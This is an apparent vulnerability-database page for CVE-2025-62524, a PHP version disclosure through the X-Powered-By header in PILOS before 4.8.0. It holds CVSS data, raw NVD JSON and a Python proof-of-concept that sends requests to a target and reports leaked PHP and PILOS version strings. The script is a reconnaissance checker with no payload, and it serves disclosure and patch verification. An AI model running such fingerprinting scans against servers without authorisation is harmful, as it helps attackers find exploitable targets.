Security Vulnerability Report
CVE-2025-62524 CVSS 5.3 MEDIUM

CVE-2025-62524

Published: 2025-10-27 21:15:38
Last Modified: 2025-11-04 18:36:37

Description

PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. PILOS before 4.8.0 exposes the PHP version via the X-Powered-By header, enabling attackers to fingerprint the server and assess potential exploits. This information disclosure vulnerability originates from PHP’s base image. Additionally, the PHP version can also be inferred through the PILOS version displayed in the footer and by examining the source code available on GitHub. This information disclosure vulnerability has been patched in PILOS in v4.8.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:* - VULNERABLE
PILOS < 4.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
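# CVE-2025-62524 PoC - PILOS PHP Version Information Disclosure
# Description: PILOS before 4.8.0 exposes PHP version via X-Powered-By header
# Severity: Medium (CVSS 5.3)
# Attack Type: Information Disclosure
import re
import sys

import requests

# Matches values such as "PHP/8.2.1" or "PHP 8.2" and captures the digits.
# A bare "PHP" value with no digits does not match and is therefore not
# reported as a version leak.
_PHP_VERSION_RE = re.compile(r'PHP[/\s]*([\d.]+)', re.IGNORECASE)
# Matches "PILOS v4.7.0" / "PILOS 4.7.0" in the page body.
_PILOS_VERSION_RE = re.compile(r'PILOS\s*v?([\d.]+)', re.IGNORECASE)


def _extract_php_version(header_value):
    """Return the PHP version found in an X-Powered-By value, or None.

    Kept free of network access so the parsing rule can be unit-tested.
    """
    if not header_value:
        return None
    match = _PHP_VERSION_RE.search(header_value)
    return match.group(1) if match else None


def check_pilos_version_disclosure(target_url):
    """
    Check if PILOS instance leaks PHP version via X-Powered-By header

    Returns True when a PHP version is present in the header and False when
    it is absent. Returns None (falsy) when the request itself fails, so a
    connection error is not mistaken for a patched target.
    """
    print(f"[*] Checking target: {target_url}")
    print("-" * 60)
    try:
        # HEAD returns the response headers without downloading the body.
        response = requests.head(target_url, timeout=10, allow_redirects=True)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")
        return None

    print(f"[+] Status Code: {response.status_code}")
    print("[+] Response Headers:")
    for header_name, header_value in response.headers.items():
        print(f" {header_name}: {header_value}")

    # requests' header mapping is case-insensitive, so one lookup replaces
    # the manual .lower() comparison in the loop.
    php_version = _extract_php_version(response.headers.get('X-Powered-By'))

    print("-" * 60)
    if php_version:
        print(f"[!] VULNERABLE: PHP version exposed via X-Powered-By: {php_version}")
        print("[!] Attackers can use this information to identify known PHP vulnerabilities")
        return True
    print("[+] SAFE: No PHP version information leaked in headers")
    return False


def get_page_footer_version(target_url):
    """
    Check if PILOS version is exposed in page footer

    The advisory notes the PHP version can also be inferred from the PILOS
    version shown in the footer, which is what this check surfaces. Returns
    the version string when the page body matches, else None. Connection
    errors are reported rather than silently swallowed.
    """
    try:
        response = requests.get(target_url, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error fetching page: {e}")
        return None
    # NOTE(review): this searches the raw response body only; a version that
    # is rendered client-side by JavaScript would not be found here.
    match = _PILOS_VERSION_RE.search(response.text)
    if match:
        print(f"[*] PILOS version detected in footer: {match.group(1)}")
        return match.group(1)
    return None


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = input("Enter PILOS target URL: ").strip()
    if not target.startswith(('http://', 'https://')):
        target = 'https://' + target

    vulnerable = check_pilos_version_disclosure(target)
    get_page_footer_version(target)
    print("-" * 60)
    if vulnerable is None:
        # Unreachable target: say so instead of reporting it as patched.
        print("[-] Could not reach the target; result is inconclusive")
        sys.exit(2)
    if vulnerable:
        print("[!] Target is vulnerable to CVE-2025-62524")
        print("[!] Recommendation: Upgrade to PILOS >= 4.8.0 or disable X-Powered-By header")
        sys.exit(1)
    print("[+] Target appears to be patched")
    sys.exit(0)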

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62524", "sourceIdentifier": "[email protected]", "published": "2025-10-27T21:15:37.930", "lastModified": "2025-11-04T18:36:37.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. PILOS before 4.8.0 exposes the PHP version via the X-Powered-By header, enabling attackers to fingerprint the server and assess potential exploits. This information disclosure vulnerability originates from PHP’s base image. Additionally, the PHP version can also be inferred through the PILOS version displayed in the footer and by examining the source code available on GitHub. This information disclosure vulnerability has been patched in PILOS in v4.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": 
true, "criteria": "cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.8.0", "matchCriteriaId": "91445D94-4D77-4EFF-A078-6AEF72F6E116"}]}]}], "references": [{"url": "https://github.com/THM-Health/PILOS/commit/14655bc4f8128ffd2b3c25004b01d9a802808da8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/THM-Health/PILOS/security/advisories/GHSA-q93h-5j6h-j22x", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}